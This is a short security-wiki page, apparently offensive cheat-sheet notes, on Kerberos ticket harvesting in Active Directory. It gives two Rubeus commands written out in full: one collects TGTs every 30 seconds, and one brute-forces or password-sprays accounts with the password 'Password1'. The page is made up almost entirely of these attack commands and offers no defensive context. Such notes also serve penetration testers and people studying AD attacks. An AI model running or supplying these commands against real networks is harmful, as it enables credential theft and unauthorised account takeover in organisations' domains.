> For the complete documentation index, see [llms.txt](https://wiki.bufu-sec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wiki.bufu-sec.com/active-directory/lateral_movement/ticket_harvesting.md).

# Ticket Harvesting

## Harvesting Tickets

```powershell
# Harvest for TGTs every 30 seconds
Rubeus.exe harvest /interval:30
```

## Brute-forcing / Password-spraying

```powershell
Rubeus.exe brute /password:Password1 /noticket
```
